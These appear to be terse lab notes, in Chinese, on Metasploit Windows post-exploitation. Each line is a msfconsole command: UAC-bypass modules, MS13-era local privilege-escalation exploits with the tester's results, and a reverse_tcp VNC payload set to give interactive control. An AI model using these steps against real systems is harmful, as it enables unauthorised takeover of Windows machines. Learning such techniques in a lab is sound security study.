local 模块都是基于一个已有的权限不够大的session
load priv 插件
提权插件
UAC会影响提权等操作
绕过UAC提权,前提获得的session是administrator权限
use exploit/windows/local/ask
每次执行操作的时候,都会在目标那询问,是否可以执行,挂载payload上去,然后利用已经有的session来执行,若目标点击是,则再获得一个shell,成功绕过UAC
use exploit/windows/local/bypassuac
利用已有session,直接绕过UAC
use exploit/windows/local/bypassuac_injection
通过一个dll来注入,来绕过UAC
利用漏洞直接提权为system,直接获得system的shell,也是利用已有的session,不论权限
use exploit/windows/local/ms13_053_schlamperei
失败
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec
这个成了DoS了
use exploit/windows/local/ms13_081_track_popup_menu
图形化shell,但是无法操作
set payload windows/vncinject/reverse_tcp
改一个配置,生产可以操作的额shell
set viewonly no
viewonly 只看